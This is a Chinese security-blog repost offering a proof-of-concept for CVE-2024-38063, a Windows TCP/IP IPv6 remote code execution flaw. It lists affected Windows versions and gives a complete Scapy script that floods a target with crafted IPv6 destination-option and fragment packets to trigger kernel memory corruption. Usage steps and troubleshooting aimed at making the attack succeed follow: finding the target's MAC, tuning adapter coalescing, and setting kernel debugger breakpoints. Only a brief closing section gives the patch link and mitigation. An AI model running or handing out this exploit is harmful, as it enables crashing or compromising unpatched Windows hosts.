Windows TCP/IP IPv6 RCE POC(CVE-2024-38063)

admin 2024年9月28日10:16:04评论20 views字数 3687阅读12分17秒阅读模式

Windows TCP/IP IPv6 RCE POC(CVE-2024-38063)

影响版本:

Windows 11 Version 24H2 for x64-based SystemsWindows 11 Version 24H2 for ARM64-based SystemsWindows Server 2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2012 (Server Core installation)Windows Server 2012Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)Windows Server 2008 for x64-based Systems Service Pack 2Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)Windows Server 2008 for 32-bit Systems Service Pack 2Windows Server 2016 (Server Core installation)Windows Server 2016Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server 2022, 23H2 Edition (Server Core installation)Windows 11 Version 23H2 for x64-based SystemsWindows 11 Version 23H2 for ARM64-based SystemsWindows 10 Version 22H2 for 32-bit SystemsWindows 10 Version 22H2 for ARM64-based SystemsWindows 10 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for ARM64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows 11 version 21H2 for ARM64-based SystemsWindows 11 version 21H2 for x64-based SystemsWindows Server 2022 (Server Core installation)Windows Server 2022Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems

验证脚本

from scapy.all import *iface=''ip_addr=''mac_addr=''num_tries=20num_batches=20def get_packets_with_mac(i):    frag_id = 0xdebac1e + i    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)    return [first, second, third]def get_packets(i):    if mac_addr != '':        return get_packets_with_mac(i)    frag_id = 0xdebac1e + i    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)    return [first, second, third]final_ps = []for _ in range(num_batches):    for i in range(num_tries):        final_ps += get_packets(i) + get_packets(i)print("Sending packets")if mac_addr != '':    sendp(final_ps, iface)else:    send(final_ps, iface)for i in range(60):    print(f"Memory corruption will be triggered in {60-i} seconds", end='r')    time.sleep(1)print("")

利用方法(需要添加ip配置)

pip3 install scapypython3 cve-2024-38063.py

不能运行故障排除

如果不起作用,可能是因为:

  • 无法通过 IPv6 访问目标系统:

    • 禁用Windows防火墙

    • 从主机 ping -6 {ipv6_address}

    • 确保你收到回复

    • 重新启用防火墙

  • 目标系统未接收数据包

    • 在目标系统上安装 wireshark,并检查脚本发送的数据包是否到达

  • scapy 报告“未找到到达目的地的 Mac 地址。使用广播。”

    • 你需要找到目标机器的mac地址

    • 这可以通过运行上面的 ping 命令并检查 wireshark 中的答复(eth 源地址字段)来完成

    • 您也可以使用 scapy: Ether(raw(sr1(IPv6(dst={your_dest_ip})/ICMPv6EchoRequest()))).src,但有时这不起作用

    • 获得 mac 地址后,将其放入脚本中的 mac_addr 字段并运行脚本

  • 目标系统上未合并数据包

    • 根据您的适配器网络适配器/驱动程序,可能很难让 Windows 合并数据包,而无需采取类似 ddos 之类的手段来淹没目标。

    • 您可以尝试修改适配器设置,例如“数据包合并”、“中断调节”、“中断调节模式”、“接收段合并”,具体取决于哪些可用。例如,在我的专用服务器上将“中断调节模式”设置为“极端”可使漏洞重现。

  • 如果其他方法都失败了,您可以附加内核调试器并检查以下几点:

    • tcpip!Ipv6pReceiveDestinationOptions-> tcpip!Ipv6pProcessOptions->被击中了tcpip!IppSendErrorList

    • 中断tcpip!Ipv6pProcessOptions并检查是否[rcx]始终为零。如果是,则由于某种原因数据包未合并。

    • 中断tcpip!Ipv6pReceiveFragment并检查是否[rcx+0x30]等于零。如果不等于零,则表示漏洞由于某种原因未能触发。

官方修复方案

厂商已发布补丁,具体链接为:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063

临时修复方案:

根据微软官方的建议,禁用服务器上的 IPv6 可临时修复该漏洞。但需要注意的是,禁用 IPv6 可能会导致某些意外的问题,请根据自身业务,酌情进行处置。

原文始发于微信公众号(信安王子):Windows TCP/IP IPv6 RCE POC(CVE-2024-38063)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日10:16:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows TCP/IP IPv6 RCE POC(CVE-2024-38063)https://cn-sec.com/archives/3108262.html

发表评论

匿名网友 填写信息